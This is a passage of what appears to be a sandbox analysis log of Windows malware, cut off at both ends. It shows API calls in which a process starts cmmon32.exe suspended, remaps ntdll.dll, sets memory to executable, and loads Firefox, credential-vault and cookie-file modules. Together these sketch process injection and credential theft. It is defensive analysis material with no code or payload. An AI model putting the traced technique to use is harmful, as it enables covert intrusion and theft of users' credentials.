IoStatusBlock=0x1af51c, FileInformation=0x1af474) returned 0x0 [0067.427] NtReadFile (in: FileHandle=0x880, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x1af51c, Buffer=0x3b9f348, BufferLength=0xa800, ByteOffset=0x1af48c*=0, Key=0x0 | out: IoStatusBlock=0x1af51c, Buffer=0x3b9f348*) returned 0x0 [0067.448] NtClose (Handle=0x880) returned 0x0 [0067.449] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\System32\\cmmon32.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1af9f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, 
hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af9cc, hNewToken=0x0 | out: lpProcessInformation=0x1af9cc*(hProcess=0x6d4, hThread=0x880, dwProcessId=0xbd4, dwThreadId=0xbd8), hNewToken=0x0) returned 1 [0067.455] NtQueryInformationProcess (in: ProcessHandle=0x6d4, ProcessInformationClass=0x0, ProcessInformation=0x1afa38, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1afa38, ReturnLength=0x0) returned 0x0 [0067.458] NtReadVirtualMemory (in: ProcessHandle=0x6d4, BaseAddress=0x7ffda008, Buffer=0x1af7c0, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x1af7c0*, NumberOfBytesRead=0x0) returned 0x0 [0078.615] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1afa40 | out: HeapArray=0x1afa40*=0x1f0000) returned 0xf [0078.622] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x1af74c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0078.624] NtCreateFile (in: FileHandle=0x1af76c, DesiredAccess=0x1200a0, ObjectAttributes=0x1af734*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1af754, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1af76c*=0x11a8, IoStatusBlock=0x1af754*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.634] NtCreateSection (in: SectionHandle=0x1af6d4, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x11a8 | out: SectionHandle=0x1af6d4*=0x354) returned 0x0 [0078.636] NtMapViewOfSection (in: SectionHandle=0x354, ProcessHandle=0xffffffff, BaseAddress=0x1af6d0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x1af6cc*=0x0, 
InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x1af6d0*=0x3710000, SectionOffset=0x0, ViewSize=0x1af6cc*=0x13c000) returned 0x40000003 [0078.638] NtClose (Handle=0x11a8) returned 0x0 [0078.638] NtClose (Handle=0x354) returned 0x0 [0078.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af784*=0x3710000, NumberOfBytesToProtect=0x1af794, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af784*=0x3710000, NumberOfBytesToProtect=0x1af794, OldAccessProtection=0x1af780*=0x2) returned 0x0 [0078.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x3711000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x3711000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x20) returned 0x0 [0078.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x37e6000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x37e6000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x20) returned 0x0 [0078.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x37e7000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x37e7000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x8) returned 0x0 [0078.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x37f0000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: BaseAddress=0x1af778*=0x37f0000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x2) returned 0x0 [0078.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1af778*=0x3847000, NumberOfBytesToProtect=0x1af77c, NewAccessProtection=0x40, OldAccessProtection=0x1af780 | out: 
BaseAddress=0x1af778*=0x3847000, NumberOfBytesToProtect=0x1af77c, OldAccessProtection=0x1af780*=0x2) returned 0x0 [0078.666] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1af76c | out: HeapArray=0x1af76c*=0x1f0000) returned 0xf [0078.708] NtAllocateVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x1af030*=0x0, ZeroBits=0x0, RegionSize=0x1af034*=0x3c08, AllocationType=0x3000, Protect=0x4) Thread: id = 125 os_tid = 0xcc0 Process: id = "8" image_name = "cmmon32.exe" filename = "c:\\windows\\system32\\cmmon32.exe" page_root = "0x7f1e6700" os_pid = "0xbd4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x610" cmd_line = "\"C:\\Windows\\System32\\cmmon32.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1464 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1465 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1466 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1467 start_va = 0x50000 end_va = 0x79fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1468 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1469 start_va = 0xef0000 
end_va = 0xefcfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 1470 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1471 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1472 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1473 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1474 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1475 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1476 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1477 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1478 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 1479 start_va = 0x6f260000 end_va = 0x6f26dfff entry_point = 0x6f260000 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\System32\\cmutil.dll" (normalized: "c:\\windows\\system32\\cmutil.dll") Region: id = 1480 start_va = 0x745f0000 end_va = 
0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1481 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1482 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1483 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1484 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1485 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1486 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1487 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1488 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") 
Region: id = 1489 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1490 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1491 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1492 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1493 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1494 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1495 start_va = 0x80000 end_va = 0x81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1496 start_va = 0x90000 end_va = 0x91fff entry_point = 0x90000 region_type = mapped_file name = "cmmon32.exe.mui" filename = "\\Windows\\System32\\en-US\\cmmon32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmmon32.exe.mui") Region: id = 1497 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1498 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1499 start_va = 0x390000 end_va = 0x490fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1500 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1501 start_va = 0x4d0000 end_va = 0x60afff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1502 start_va = 0xf00000 end_va = 0x1afffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f00000" filename = "" Region: id = 1503 start_va = 0x610000 end_va = 0x74cfff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1504 start_va = 0x750000 end_va = 0x9cafff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1505 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1506 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1729 start_va = 0x1c0000 end_va = 0x1e9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1730 start_va = 0x4d0000 end_va = 0x4f9fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1731 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1732 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1733 start_va = 0x9d0000 end_va = 0xbc4fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1734 start_va = 0xbd0000 end_va = 0xdc4fff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id 
= 1735 start_va = 0x1b00000 end_va = 0x24c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b00000" filename = "" Region: id = 1736 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1737 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1738 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1739 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1740 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1741 start_va = 0x24d0000 end_va = 0x26c4fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1742 start_va = 0x5a0000 end_va = 0x5fbfff entry_point = 0x5a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1743 start_va = 0x5a0000 end_va = 0x5fbfff entry_point = 0x5a0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1744 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1745 start_va = 0x73f00000 end_va = 
0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1746 start_va = 0x690000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1747 start_va = 0xdd0000 end_va = 0xeaefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 1748 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1749 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1750 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1751 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1752 start_va = 0x6d270000 end_va = 0x6dceffff entry_point = 0x6d270000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1753 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1754 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1755 start_va = 0x75810000 end_va = 0x76459fff 
entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1756 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1757 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1758 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x4a0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1759 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1760 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1761 start_va = 0x540000 end_va = 0x540fff entry_point = 0x540000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1762 start_va = 0x550000 end_va = 0x551fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1763 start_va = 0x26d0000 end_va = 0x299efff entry_point = 0x26d0000 region_type = mapped_file name = "sortdefault.nls" filename = 
"\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1764 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1765 start_va = 0x71ba0000 end_va = 0x71bcdfff entry_point = 0x71ba0000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1766 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1767 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1768 start_va = 0x540000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1769 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1770 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x5a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1771 start_va = 0x5b0000 end_va = 0x5b7fff entry_point = 0x5b0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy 
yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1772 start_va = 0x5c0000 end_va = 0x5cbfff entry_point = 0x5c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1773 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1774 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1775 start_va = 0x5d0000 end_va = 0x5d7fff entry_point = 0x5d0000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 1776 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x5e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1777 start_va = 0x29a0000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 1778 start_va = 0x72000000 end_va = 0x721b4fff entry_point = 0x72000000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll") Region: id = 1779 start_va = 0x6e510000 end_va = 0x6e541fff 
entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1780 start_va = 0x722a0000 end_va = 0x722a6fff entry_point = 0x722a0000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll") Region: id = 1781 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1782 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1783 start_va = 0x70fb0000 end_va = 0x7106efff entry_point = 0x70fb0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 1784 start_va = 0x722a0000 end_va = 0x722abfff entry_point = 0x722a0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 1785 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1786 start_va = 0x24d0000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1787 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id 
= 1788 start_va = 0x6d0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1789 start_va = 0x710000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1790 start_va = 0x2aa0000 end_va = 0x2f91fff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 1791 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1792 start_va = 0x73aa0000 end_va = 0x73b9afff entry_point = 0x73aa0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1793 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1794 start_va = 0x620000 end_va = 0x620fff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1795 start_va = 0x25b0000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 1796 start_va = 0x24d0000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Thread: id = 100 os_tid = 0xbd8 [0070.577] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x24f050 | out: HeapArray=0x24f050*=0xb0000) returned 0x3 [0070.583] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x24f000, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0070.585] NtCreateFile (in: FileHandle=0x24f020, DesiredAccess=0x120089, ObjectAttributes=0x24efe8*(Length=0x18, RootDirectory=0x0, 
